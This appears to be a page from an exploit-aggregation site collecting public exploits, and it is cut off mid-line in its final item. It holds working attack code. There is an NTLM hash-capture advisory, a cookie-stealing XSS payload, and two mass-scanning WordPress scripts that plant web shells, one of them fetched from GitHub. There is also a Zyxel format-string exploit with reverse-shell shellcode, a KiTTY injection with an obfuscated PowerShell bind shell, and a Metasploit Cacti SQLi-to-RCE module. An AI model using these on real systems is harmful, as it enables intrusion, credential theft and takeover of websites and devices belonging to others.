Latest exploits :: CodePwn

<pre><code>[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/IBMI_ACCESS_CLIENT_REMOTE_CREDENTIAL_THEFT_CVE-2024-22318.txt [+] twitter.com/hyp3rlinx [+] ISR: ApparitionSec [Vendor] www.ibm.com [Product] IBM i Access Client Solutions [Versions] All [Remediation/Fixes] None [Vulnerability Type] Remote Credential Theft [CVE Reference] CVE-2024-22318 [Security Issue] IBM i Access Client Solutions (ACS) is vulnerable to remote credential theft when NT LAN Manager (NTLM) is enabled on Windows workstations. Attackers can create UNC capable paths within ACS 5250 display terminal configuration ".HOD" or ".WS" files to point to a hostile server. If NTLM is enabled and the user opens an attacker supplied file the Windows operating system will try to authenticate using the current user's session. The attacker controlled server could then capture the NTLM hash information to obtain the user's credentials. [References] https://www.ibm.com/support/pages/node/7116091 [Exploit/POC] The client access .HOD File vulnerable parameters: 1) screenHistoryArchiveLocation=\\ATTACKER-SERVER\RemoteCredTheftP0c [KeyRemapFile] 2) Filename= \\ATTACKER-SERVER\RemoteCredTheftP0c Next, Kali Linux Responder.py to capture: Responder.py -I eth0 -A -vv The client access legacy .WS File vulnerable parameters: DefaultKeyboard= \\ATTACKER-SERVER\RemoteCredTheftP0c Example, client access older .WS file [Profile] ID=WS Version=9 [Telnet5250] AssociatedPrinterStartMinimized=N AssociatedPrinterTimeout=0 SSLClientAuthentication=Y HostName=PWN AssociatedPrinterClose=N Security=CA400 CertSelection=AUTOSELECT AutoReconnect=Y [KeepAlive] KeepAliveTimeOut=0 [Keyboard] IBMDefaultKeyboard=N DefaultKeyboard=\\ATTACKER-SERVER\RemoteCredTheftP0c [Communication] Link=telnet5250 [Network Access] Remote [Severity] Medium [Disclosure Timeline] Vendor Notification: December 14, 2023 Vendor Addresses Issue: February 7, 2024 February 8, 2024 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx </code></pre>

<pre><code># Exploit Title: Advanced Page Visit Counter 1.0 - Admin+ Stored Cross-Site Scripting (XSS) (Authenticated) # Date: 11.10.2023 # Exploit Author: Furkan ÖZER # Software Link: https://wordpress.org/plugins/advanced-page-visit-counter/ # Version: 8.0.5 # Tested on: Kali-Linux,Windows10,Windows 11 # CVE: N/A # Description: Advanced Page Visit Counter is a remarkable Google Analytics alternative specifically designed for WordPress websites, and it has quickly become a must-have plugin for website owners and administrators seeking powerful tracking and analytical capabilities. With the recent addition of Enhanced eCommerce Tracking for WooCommerce, this plugin has become even more indispensable for online store owners. Homepage | Support | Premium Version If you’re in search of a GDPR-friendly website analytics plugin exclusively designed for WordPress, look no further than Advanced Page Visit Counter. This exceptional plugin offers a compelling alternative to Google Analytics and is definitely worth a try for those seeking enhanced data privacy compliance. This is a free plugin and doesn’t require you to create an account on another site. All features outlined below are included in the free plugin. Description of the owner of the plugin Stored Cross-Site Scripting attack against the administrators or the other authenticated users. The plugin does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup) The details of the discovery are given below. # Steps To Reproduce: 1. Install and activate the Advanced Page Visit Counter plugin. 2. Visit the "Settings" interface available in settings page of the plugin that is named "Widget Settings" 3. In the plugin's "Today's Count Label" setting field, enter the payload Payload: " "type=image src=1 onerror=alert(document.cookie)> " 6. Click the "Save Changes" button. 7. The XSS will be triggered on the settings page when every visit of an authenticated user. # Video Link https://youtu.be/zcfciGZLriM </code></pre>

<pre><code># Exploit Title: Wordpress Augmented-Reality - Remote Code Execution Unauthenticated # Date: 2023-09-20 # Author: Milad Karimi (Ex3ptionaL) # Category : webapps # Tested on: windows 10 , firefox import requests as req import json import sys import random import uuid import urllib.parse import urllib3 from multiprocessing.dummy import Pool as ThreadPool urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) filename="{}.php".format(str(uuid.uuid4())[:8]) proxies = {} #proxies = { # 'http': 'http://127.0.0.1:8080', # 'https': 'http://127.0.0.1:8080', #} phash = "l1_Lw" r=req.Session() user_agent={ "User-Agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36" } r.headers.update(user_agent) def is_json(myjson): try: json_object = json.loads(myjson) except ValueError as e: return False return True def mkfile(target): data={"cmd" : "mkfile", "target":phash, "name":filename} resp=r.post(target, data=data) respon = resp.text if resp.status_code == 200 and is_json(respon): resp_json=respon.replace(r"\/", "").replace("\\", "") resp_json=json.loads(resp_json) return resp_json["added"][0]["hash"] else: return False def put(target, hash): content=req.get("https://raw.githubusercontent.com/0x5a455553/MARIJUANA/master/MARIJUANA.php", proxies=proxies, verify=False) content=content.text data={"cmd" : "put", "target":hash, "content": content} respon=r.post(target, data=data, proxies=proxies, verify=False) if respon.status_code == 200: return True def exploit(target): try: vuln_path = "{}/wp-content/plugins/augmented-reality/vendor/elfinder/php/connector.minimal.php".format(target) respon=r.get(vuln_path, proxies=proxies, verify=False).status_code if respon != 200: print("[FAIL] {}".format(target)) return hash=mkfile(vuln_path) if hash == False: print("[FAIL] {}".format(target)) return if put(vuln_path, hash): shell_path = "{}/wp-content/plugins/augmented-reality/file_manager/{}".format(target,filename) status = r.get(shell_path, proxies=proxies, verify=False).status_code if status==200 : with open("result.txt", "a") as newline: newline.write("{}\n".format(shell_path)) newline.close() print("[OK] {}".format(shell_path)) return else: print("[FAIL] {}".format(target)) return else: print("[FAIL] {}".format(target)) return except req.exceptions.SSLError: print("[FAIL] {}".format(target)) return except req.exceptions.ConnectionError: print("[FAIL] {}".format(target)) return def main(): threads = input("[?] Threads > ") list_file = input("[?] List websites file > ") print("[!] all result saved in result.txt") with open(list_file, "r") as file: lines = [line.rstrip() for line in file] th = ThreadPool(int(threads)) th.map(exploit, lines) if __name__ == "__main__": main() </code></pre>

<pre><code># Exploit Title: Wordpress Seotheme - Remote Code Execution Unauthenticated # Date: 2023-09-20 # Author: Milad Karimi (Ex3ptionaL) # Category : webapps # Tested on: windows 10 , firefox import sys , requests, re from multiprocessing.dummy import Pool from colorama import Fore from colorama import init init(autoreset=True) fr = Fore.RED fc = Fore.CYAN fw = Fore.WHITE fg = Fore.GREEN fm = Fore.MAGENTA shell = """<?php echo "EX"; echo " ".php_uname()." "; echo "<form method='post' enctype='multipart/form-data'> <input type='file' name='zb'><input type='submit' name='upload' value='upload'></form>"; if($_POST['upload']) { if(@copy($_FILES['zb']['tmp_name'], $_FILES['zb']['name'])) { echo "eXploiting Done"; } else { echo "Failed to Upload."; } } ?>""" requests.urllib3.disable_warnings() headers = {'Connection': 'keep-alive', 'Cache-Control': 'max-age=0', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8', 'Accept-Encoding': 'gzip, deflate', 'Accept-Language': 'en-US,en;q=0.9,fr;q=0.8', 'referer': 'www.google.com'} try: target = [i.strip() for i in open(sys.argv[1], mode='r').readlines()] except IndexError: path = str(sys.argv[0]).split('\\') exit('\n [!] Enter <' + path[len(path) - 1] + '> <sites.txt>') def URLdomain(site): if site.startswith("http://") : site = site.replace("http://","") elif site.startswith("https://") : site = site.replace("https://","") else : pass pattern = re.compile('(.*)/') while re.findall(pattern,site): sitez = re.findall(pattern,site) site = sitez[0] return site def FourHundredThree(url): try: url = 'http://' + URLdomain(url) check = requests.get(url+'/wp-content/plugins/seoplugins/mar.php',headers=headers, allow_redirects=True,timeout=15) if '//0x5a455553.github.io/MARIJUANA/icon.png' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('seoplugins-Shells.txt', 'a').write(url + '/wp-content/plugins/seoplugins/mar.php\n') else: url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/plugins/seoplugins/mar.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if '//0x5a455553.github.io/MARIJUANA/icon.png' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('seoplugins-Shells.txt', 'a').write(url + '/wp-content/plugins/seoplugins/mar.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) url = 'http://' + URLdomain(url) check = requests.get(url+'/wp-content/themes/seotheme/mar.php',headers=headers, allow_redirects=True,timeout=15) if '//0x5a455553.github.io/MARIJUANA/icon.png' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('seotheme-Shells.txt', 'a').write(url + '/wp-content/themes/seotheme/mar.php\n') else: url = 'https://' + URLdomain(url) check = requests.get(url+'/wp-content/themes/seotheme/mar.php',headers=headers, allow_redirects=True,verify=False ,timeout=15) if '//0x5a455553.github.io/MARIJUANA/icon.png' in check.content: print ' -| ' + url + ' --> {}[Succefully]'.format(fg) open('seotheme-Shells.txt', 'a').write(url + '/wp-content/themes/seotheme/mar.php\n') else: print ' -| ' + url + ' --> {}[Failed]'.format(fr) except : print ' -| ' + url + ' --> {}[Failed]'.format(fr) mp = Pool(100) mp.map(FourHundredThree, target) mp.close() mp.join() print '\n [!] {}Saved in Shells.txt'.format(fc) </code></pre>

<pre><code>#!/usr/bin/expect -f # # raptor_zysh_fhtagn.exp - zysh format string PoC exploit # Copyright (c) 2022 Marco Ivaldi <raptor@0xdeadbeef.info> # # "We live on a placid island of ignorance in the midst of black seas of # infinity, and it was not meant that we should voyage far." # -- H. P. Lovecraft, The Call of Cthulhu # # "Multiple improper input validation flaws were identified in some CLI # commands of Zyxel USG/ZyWALL series firmware versions 4.09 through 4.71, # USG FLEX series firmware versions 4.50 through 5.21, ATP series firmware # versions 4.32 through 5.21, VPN series firmware versions 4.30 through # 5.21, NSG series firmware versions 1.00 through 1.33 Patch 4, NXC2500 # firmware version 6.10(AAIG.3) and earlier versions, NAP203 firmware # version 6.25(ABFA.7) and earlier versions, NWA50AX firmware version # 6.25(ABYW.5) and earlier versions, WAC500 firmware version 6.30(ABVS.2) # and earlier versions, and WAX510D firmware version 6.30(ABTF.2) and # earlier versions, that could allow a local authenticated attacker to # cause a buffer overflow or a system crash via a crafted payload." # -- CVE-2022-26531 # # The zysh binary is a restricted shell that implements the command-line # interface (CLI) on multiple Zyxel products. This proof-of-concept exploit # demonstrates how to leverage the format string bugs I have identified in # the "extension" argument of some zysh commands, to execute arbitrary code # and escape the restricted shell environment. # # - This exploit targets the "ping" zysh command. # - It overwrites the .got entry of fork() with the shellcode address. # - The shellcode address is calculated based on a leaked stack address. # - Hardcoded offsets and values might need some tweaking, see comments. # - Automation/weaponization for other targets is left as an exercise. # # For additional details on my bug hunting journey and on the # vulnerabilities themselves, you can refer to the official advisory: # https://github.com/0xdea/advisories/blob/master/HNS-2022-02-zyxel-zysh.txt # # Usage: # raptor@blumenkraft ~ % ./raptor_zysh_fhtagn.exp <REDACTED> admin password # raptor_zysh_fhtagn.exp - zysh format string PoC exploit # Copyright (c) 2022 Marco Ivaldi <raptor@0xdeadbeef.info> # # Leaked stack address: 0x7fe97170 # Shellcode address: 0x7fe9de40 # Base string length: 46 # Hostile format string: %.18u%1801$n%.169u%1801$hn%.150u%1801$hhn%.95u%1802$hhn # # *** enjoy your shell! *** # # sh-5.1$ uname -snrmp # Linux USG20-VPN 3.10.87-rt80-Cavium-Octeon mips64 Cavium Octeon III V0.2 FPU V0.0 # sh-5.1$ id # uid=10007(admin) gid=10000(operator) groups=10000(operator) # # Tested on: # Zyxel USG20-VPN with Firmware 5.10 # [other appliances/versions are also likely vulnerable] # # change string encoding to 8-bit ASCII to avoid annoying conversion to UTF-8 encoding system iso8859-1 # hostile format string to leak stack address via direct parameter access set offset1 77 set leak [format "AAAA.0x%%%d\$x" $offset1] # offsets to reach addresses in retloc sled via direct parameter access set offset2 1801 set offset3 [expr $offset2 + 1] # difference between leaked stack address and shellcode address set diff 27856 # retloc sled # $ mips64-linux-readelf -a zysh | grep JUMP | grep fork # 112dd558 0000967f R_MIPS_JUMP_SLOT 00000000 fork@GLIBC_2.0 # ^^^^^^^^ << this is the address we need to encode: [112dd558][112dd558][112dd558+2][112dd558+2] set retloc [string repeat "\x11\x2d\xd5\x58\x11\x2d\xd5\x58\x11\x2d\xd5\x5a\x11\x2d\xd5\x5a" 1024] # nop sled # nop-equivalent instruction: xor $t0, $t0, $t0 set nops [string repeat "\x01\x8c\x60\x26" 64] # shellcode # https://github.com/0xdea/shellcode/blob/main/MIPS/mips_n32_msb_linux_revsh.c set sc "\x3c\x0c\x2f\x62\x25\x8c\x69\x6e\xaf\xac\xff\xec\x3c\x0c\x2f\x73\x25\x8c\x68\x68\xaf\xac\xff\xf0\xa3\xa0\xff\xf3\x27\xa4\xff\xec\xaf\xa4\xff\xf8\xaf\xa0\xff\xfc\x27\xa5\xff\xf8\x28\x06\xff\xff\x24\x02\x17\xa9\x01\x01\x01\x0c" # padding to align payload in memory (might need adjusting) set padding "AAA" # print header send_user "raptor_zysh_fhtagn.exp - zysh format string PoC exploit\n" send_user "Copyright (c) 2022 Marco Ivaldi <raptor@0xdeadbeef.info>\n\n" # check command line if { [llength $argv] != 3} { send_error "usage: ./raptor_zysh_fhtagn.exp <host> <user> <pass>\n" exit 1 } # get SSH connection parameters set port "22" set host [lindex $argv 0] set user [lindex $argv 1] set pass [lindex $argv 2] # inject payload via the TERM environment variable set env(TERM) $retloc$nops$sc$padding # connect to target via SSH log_user 0 spawn -noecho ssh -q -o StrictHostKeyChecking=no -p $port $host -l $user expect { -nocase "password*" { send "$pass\r" } default { send_error "error: could not connect to ssh\n" exit 1 } } # leak stack address expect { "Router? $" { send "ping 127.0.0.1 extension $leak\r" } default { send_error "error: could not access zysh prompt\n" exit 1 } } expect { -re "ping: unknown host AAAA\.(0x.*)\r\n" { } default { send_error "error: could not leak stack address\n" exit 1 } } set leaked $expect_out(1,string) send_user "Leaked stack address:\t$leaked\n" # calculate shellcode address set retval [expr $leaked + $diff] set retval [format 0x%x $retval] send_user "Shellcode address:\t$retval\n" # extract each byte of shellcode address set b1 [expr ($retval & 0xff000000) >> 24] set b2 [expr ($retval & 0x00ff0000) >> 16] set b3 [expr ($retval & 0x0000ff00) >> 8] set b4 [expr ($retval & 0x000000ff)] set b1 [format 0x%x $b1] set b2 [format 0x%x $b2] set b3 [format 0x%x $b3] set b4 [format 0x%x $b4] # calculate numeric arguments for the hostile format string set base [string length "/bin/zysudo.suid /bin/ping 127.0.0.1 -n -c 3 "] send_user "Base string length:\t$base\n" set n1 [expr ($b4 - $base) % 0x100] set n2 [expr ($b2 - $b4) % 0x100] set n3 [expr ($b1 - $b2) % 0x100] set n4 [expr ($b3 - $b1) % 0x100] # check for dangerous numeric arguments below 10 if {$n1 < 10} { incr n1 0x100 } if {$n2 < 10} { incr n2 0x100 } if {$n3 < 10} { incr n3 0x100 } if {$n4 < 10} { incr n4 0x100 } # craft the hostile format string set exploit [format "%%.%du%%$offset2\$n%%.%du%%$offset2\$hn%%.%du%%$offset2\$hhn%%.%du%%$offset3\$hhn" $n1 $n2 $n3 $n4] send_user "Hostile format string:\t$exploit\n\n" # uncomment to debug # interact + # exploit target set prompt "(#|\\\$) $" expect { "Router? $" { send "ping 127.0.0.1 extension $exploit\r" } default { send_error "error: could not access zysh prompt\n" exit 1 } } expect { "Router? $" { send_error "error: could not exploit target\n" exit 1 } -re $prompt { send_user "*** enjoy your shell! ***\n" send "\r" interact } default { send_error "error: could not exploit target\n" exit 1 } } </code></pre>

<pre><code>#!/usr/bin/python #----------------------------------------------------------------------------------------# # Exploit: KiTTY ≤ 0.76.1.13 Command Injection Vulnerability in KiTTY # # Get Remote File Through SCP Input (CVE-2024-23749) # # OS: Microsoft Windows 11/10/8/7/XP # # Author: DEFCESCO (Austin A. DeFrancesco) # # Software: # # https://github.com/cyd01/KiTTY/releases/download/v0.76.1.13/kitty-bin-0.76.1.13.zip # #----------------------------------------------------------------------------------------# # More details can be found on my blog: https://blog.DEFCESCO.io/Hell0+KiTTY # #----------------------------------------------------------------------------------------# # msf6 payload(cmd/windows/powershell_bind_tcp) > to_handler # # [*] Payload Handler Started as Job 1 # # msf6 payload(cmd/windows/powershell_bind_tcp) > # # [*] Started bind TCP handler against 192.168.100.28:4444 # # [*] Powershell session session 1 opened (192.168.100.119:36969 -> 192.168.100.28:4444) # #----------------------------------------------------------------------------------------# import os import sys #-----------------------------------------------------------------# # msf6 payload(cmd/windows/powershell_bind_tcp) > generate -f raw # #-----------------------------------------------------------------# shellcode = b'powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create' shellcode += b'((New-Object System.IO.StreamReader(New-Object System.IO.Compression.G' shellcode += b'zipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBa' shellcode += b'se64String(((\'H4sIAE7efGUCA5VVTW/b{2}BC{1}+1cMD{2}1GQiTCDXoKkGJdNV0Ey' shellcode += b'LZGlTYHw0BoahxrQ5NekoptJP7vJSXqw3\'+\'GCbXWwJc7w8fHNG3JRCmYKKeBvNMktzh' shellcode += b'kvUBgYPA3APsGG\'+\'wQV8wU3ydf4vMgPJzW6NX+gK7aAhNj+t8ptk8l3jJ1zQkptUYW4' shellcode += b'jBeXa\'+\'QgRGld\'+\'hmTZTc7siLDDveG2lyB/vBoqG4lhtU{1}suygyo+oYquwvp{1' shellcode += b'}mhlViPtZkMrVioo8PhzNNGdSvBj8JDeCS5pXo5HHVJKh1u\'+\'AFWMm85{2}gI/hVGUK' shellcode += b'cUCwibZSDB/2A4L0Q+jKpgPa+aywttUKCy\'+\'k6fZzr6viFMtk+wBjSY3bH3tM2bv7XM' shellcode += b'8kWhDlXHr\'+\'+pWrqC/RRS{1}vzBiujQWsyxHWVPZv0VX4iErjMeMWulfy15inE7/QcB' shellcode += b'g76n6{1}Qa2ZNgrpyhGs8Yj1VlaNWWIdpbokNSNnj6GvQI+P1jxrwN6ghKxUhdmRrEkN/f' shellcode += b'pxsLA+wjh8Cm4s+h4SqmF6M{2}cbrqTBFJUpFgWjBn{1}QXuTUmS2lnM8pe5hF0St0yLg0' shellcode += b'S+dUN2ms{2}zECUXIeDw3X786GnkEfoFWm21lfuul8Z3A6mwXu35luRMjZyD7PfzyN{\'+' shellcode += b'\'1}l5dFHkTDqcGt4agYDJ3jj4/H2fp1VXkFP/ocsLhrbWm3GiYu{2}bJlsg5qFIImw\'+' shellcode += b'\'1Wj1Jbew7hFAIUj+fuS7jmPrVjtjRtgMnVujRd8E6kcr\'+\'1Txf3SQJhG8E/BlNRyY' shellcode += b'SCVai1VJSGBsVvMJWlQaLEfMSd34k5443k5yK0tBobdxuJR3H2Qax\'+\'T3Ztk3Tt{2}2' shellcode += b'fesc{2}ef3VJqezuDaQjpZfMuTlufvc21mfZbqkrKl5VyDQiHaI6XL6mi7Jzw4iSPS7LY+' shellcode += b'tBqk6PlKPMoHTC63a6uttnq3KPu+pTbLgmMYBkXlunoT35DmYe2xGEYxBAfsI0gEwuhI0k' shellcode += b'unH+Y3Vsu3LgXfmC6FVBpfes07FNte1FHpofnzodpd\'+\'IyoERfSimrYbXTGP{1}g1Jc' shellcode += b'7\'+\'jV4Gcf/nwHz/C1NEmNCt48B1BnUAnSAJ/CySSDE/tf6X8tWeXhiEyoWbroBzjpQL' shellcode += b'a{2}SIBKSTUdzQ4W67Gu4oRxpCqMXmNw0f+wrbYdHBv4l/zbwfyvY/uGPfJrM+czL/Wyve' shellcode += b'/8weMP85RLjX4/VTs2t1DfMN3VlBm5bu4j/2ud2V7lbe3cFfoTVXnPBo0IAAA{0}\')-f' shellcode += b'\'=\',\'9\',\'O\')))),[System.IO.Compression.CompressionMode]::Decompr' shellcode += b'ess))).ReadToEnd()))\"' escape_sequence = b'\033]0;__rv:' escape_sequence += b'" & ' escape_sequence += shellcode escape_sequence += b' #\007' stdout = os.fdopen(sys.stdout.fileno(), 'wb') stdout.write(escape_sequence) stdout.flush() </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::SQLi include Msf::Exploit::FileDropper prepend Msf::Exploit::Remote::AutoCheck class CactiError < StandardError; end class CactiNotFoundError < CactiError; end class CactiVersionNotFoundError < CactiError; end class CactiNoAccessError < CactiError; end class CactiCsrfNotFoundError < CactiError; end class CactiLoginError < CactiError; end def initialize(info = {}) super( update_info( info, 'Name' => 'Cacti RCE via SQLi in pollers.php', 'Description' => %q{ This exploit module leverages a SQLi (CVE-2023-49085) and a LFI (CVE-2023-49084) vulnerability in Cacti versions prior to 1.2.26 to achieve RCE. Authentication is needed and the account must have access to the vulnerable PHP script (`pollers.php`). This is granted by setting the `Sites/Devices/Data` permission in the `General Administration` section. }, 'License' => MSF_LICENSE, 'Author' => [ 'Aleksey Solovev', # Initial research and discovery 'Christophe De La Fuente' # Metasploit module ], 'References' => [ [ 'URL', 'https://github.com/Cacti/cacti/security/advisories/GHSA-vr3c-38wh-g855'], # SQLi [ 'URL', 'https://github.com/Cacti/cacti/security/advisories/GHSA-pfh9-gwm6-86vp'], # LFI (RCE) [ 'CVE', '2023-49085'], # SQLi [ 'CVE', '2023-49084'] # LFI (RCE) ], 'Platform' => ['unix linux win'], 'Privileged' => false, 'Arch' => ARCH_CMD, 'Targets' => [ [ 'Linux Command', { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix', 'linux' ] } ], [ 'Windows Command', { 'Arch' => ARCH_CMD, 'Platform' => 'win' } ] ], 'DefaultOptions' => { 'SqliDelay' => 3 }, 'DisclosureDate' => '2023-12-20', 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS] } ) ) register_options( [ OptString.new('USERNAME', [ true, 'User to login with', 'admin']), OptString.new('PASSWORD', [ true, 'Password to login with', 'admin']), OptString.new('TARGETURI', [ true, 'The base URI of Cacti', '/cacti']) ] ) end def sqli @sqli ||= create_sqli(dbms: SQLi::MySQLi::TimeBasedBlind) do |sqli_payload| sqli_final_payload = '"' sqli_final_payload << ';select ' unless sqli_payload.start_with?(';') || sqli_payload.start_with?(' and') sqli_final_payload << "#{sqli_payload};select * from poller where 1=1 and '%'=\"" send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'pollers.php'), 'method' => 'POST', 'keep_cookies' => true, 'vars_post' => { '__csrf_magic' => @csrf_token, 'name' => 'Main Poller', 'hostname' => 'localhost', 'timezone' => '', 'notes' => '', 'processes' => '1', 'threads' => '1', 'id' => '2', 'save_component_poller' => '1', 'action' => 'save', 'dbhost' => sqli_final_payload }, 'vars_get' => { 'header' => 'false' } ) end end def get_version(html) # This will return an empty string if there is no match version_str = html.xpath('//div[@class="versionInfo"]').text unless version_str.include?('The Cacti Group') raise CactiNotFoundError, 'The web server is not running Cacti' end unless version_str.match(/Version (?<version>\d{1,2}\.\d{1,2}.\d{1,2})/) raise CactiVersionNotFoundError, 'Could not detect the version' end Regexp.last_match[:version] end def get_csrf_token(html) html.xpath('//form/input[@name="__csrf_magic"]/@value').text end def do_login if @csrf_token.blank? || @cacti_version.blank? res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php'), 'method' => 'GET', 'keep_cookies' => true ) if res.nil? raise CactiNoAccessError, 'Could not access `index.php` - no response' end html = res.get_html_document if @csrf_token.blank? print_status('Getting the CSRF token to login') @csrf_token = get_csrf_token(html) if @csrf_token.empty? # raise an error since without the CSRF token, we cannot login raise CactiCsrfNotFoundError, 'Cannot get the CSRF token' else vprint_good("CSRF token: #{@csrf_token}") end end if @cacti_version.blank? print_status('Getting the version') begin @cacti_version = get_version(html) vprint_good("Version: #{@cacti_version}") rescue CactiError => e # We can still log in without the version print_bad("Could not get the version, the exploit might fail: #{e}") end end end print_status("Attempting login with user `#{datastore['USERNAME']}` and password `#{datastore['PASSWORD']}`") res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php'), 'method' => 'POST', 'keep_cookies' => true, 'vars_post' => { '__csrf_magic' => @csrf_token, 'action' => 'login', 'login_username' => datastore['USERNAME'], 'login_password' => datastore['PASSWORD'] } ) raise CactiNoAccessError, 'Could not login - no response' if res.nil? raise CactiLoginError, "Login failure - unexpected HTTP response code: #{res.code}" unless res.code == 302 print_good('Logged in') end def check # Step 1 - Check if the target is Cacti and get the version print_status('Checking Cacti version') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'index.php'), 'method' => 'GET', 'keep_cookies' => true ) return CheckCode::Unknown('Could not connect to the web server - no response') if res.nil? html = res.get_html_document begin @cacti_version = get_version(html) version_msg = "The web server is running Cacti version #{@cacti_version}" rescue CactiNotFoundError => e return CheckCode::Safe(e.message) rescue CactiVersionNotFoundError => e return CheckCode::Unknown(e.message) end if Rex::Version.new(@cacti_version) < Rex::Version.new('1.2.26') print_good(version_msg) else return CheckCode::Safe(version_msg) end # Step 2 - Login @csrf_token = get_csrf_token(html) return CheckCode::Unknown('Could not get the CSRF token from `index.php`') if @csrf_token.empty? begin do_login rescue CactiError => e return CheckCode::Unknown("Login failed: #{e}") end @logged_in = true # Step 3 - Check if the user has enough permissions to reach `pollers.php` print_status('Checking permissions to access `pollers.php`') res = send_request_cgi( 'uri' => normalize_uri(target_uri.path, 'pollers.php'), 'method' => 'GET', 'keep_cookies' => true, 'headers' => { 'X-Requested-With' => 'XMLHttpRequest' } ) return CheckCode::Unknown('Could not access `pollers.php` - no response') if res.nil? return CheckCode::Safe('Could not access `pollers.php` - insufficient permissions') if res.code == 401 return CheckCode::Unknown("Could not access `pollers.php` - unexpected HTTP response code: #{res.code}") unless res.code == 200 # Step 4 - Check if it is vulnerable to SQLi print_status('Attempting SQLi to check if the target is vulnerable') return CheckCode::Safe('Blind SQL injection test failed') unless sqli.test_vulnerable CheckCode::Vulnerable end def get_ext_link_id # Get an unused External Link ID with a time-based SQLi @ext_link_id = rand(1000..9999) loop do _res, elapsed_time = Rex::Stopwatch.elapsed_time do sqli.raw_run_sql("if(id,sleep(#{datastore['SqliDelay']}),null) from external_links where id=#{@ext_link_id}") end break if elapsed_time < datastore['SqliDelay'] @ext_link_id = rand(1000..9999) end vprint_good("Got external link ID #{@ext_link_id}") end def exploit # `#do_login` will take care of populating `@csrf_token` and `@cacti_version` unless @logged_in begin do_login rescue CactiError => e fail_with(Failure::NoAccess, "Login failure: #{e}") end end @log_file_path = "log/cacti#{rand(1..999)}.log" print_status("Backing up the current log file path and adding a new path (#{@log_file_path}) to the `settings` table") @log_setting_name_bak = '_path_cactilog' sqli.raw_run_sql(";update settings set name='#{@log_setting_name_bak}' where name='path_cactilog'") @do_settings_cleanup = true sqli.raw_run_sql(";insert into settings (name,value) values ('path_cactilog','#{@log_file_path}')") register_file_for_cleanup(@log_file_path) print_status("Inserting the log file path `#{@log_file_path}` to the external links table") log_file_path_lfi = "../../#{@log_file_path}" # Some specific path tarversal needs to be prepended to bypass the v1.2.25 fix in `link.php` (line 79): # $file = $config['base_path'] . "/include/content/" . str_replace('../', '', $page['contentfile']); log_file_path_lfi = "....//....//#{@log_file_path}" if @cacti_version && Rex::Version.new(@cacti_version) == Rex::Version.new('1.2.25') get_ext_link_id sqli.raw_run_sql(";insert into external_links (id,sortorder,enabled,contentfile,title,style) values (#{@ext_link_id},2,'on','#{log_file_path_lfi}','Log-#{rand_text_numeric(3..5)}','CONSOLE')") @do_ext_link_cleanup = true print_status('Getting the user ID and setting permissions (it might take a few minutes)') user_id = sqli.run_sql("select id from user_auth where username='#{datastore['USERNAME']}'") fail_with(Failure::NotFound, 'User ID not found') unless user_id =~ (/\A\d+\Z/) sqli.raw_run_sql(";insert into user_auth_realm (realm_id,user_id) values (#{10000 + @ext_link_id},#{user_id})") @do_perms_cleanup = true print_status('Logging in again to apply new settings and permissions') # Keep a copy of the cookie_jar and the CSRF token to be used later by the cleanup routine and remove all cookies to login again. # This is required since this new session will block after triggering the payload and we won't be able to reuse it to cleanup. cookie_jar_bak = cookie_jar.clone cookie_jar.clear csrf_token_bak = @csrf_token # Setting `@csrf_token` to nil will force `#do_login` to get a fresh CSRF token @csrf_token = nil begin do_login rescue CactiError => e fail_with(Failure::NoAccess, "Login failure: #{e}") end print_status('Poisoning the log') header_name = rand_text_alpha(1).upcase sqli.raw_run_sql(" and updatexml(rand(),concat(CHAR(60),'?=system($_SERVER[\\'HTTP_#{header_name}\\']);?>',CHAR(126)),null)") print_status('Triggering the payload') # Expecting no response send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'link.php'), 'method' => 'GET', 'keep_cookies' => true, 'headers' => { header_name => payload.encoded }, 'vars_get' => { 'id' => @ext_link_id, 'headercontent' => 'true' } }, 0) # Restore the cookie_jar and the CSRF token to run cleanup without being blocked cookie_jar.clear self.cookie_jar = cookie_jar_bak @csrf_token = csrf_token_bak end def cleanup super if @do_ext_link_cleanup print_status('Cleaning up external link using SQLi') sqli.raw_run_sql(";delete from external_links where id=#{@ext_link_id}") end if @do_perms_cleanup print_status('Cleaning up permissions using SQLi') sqli.raw_run_sql(";delete from 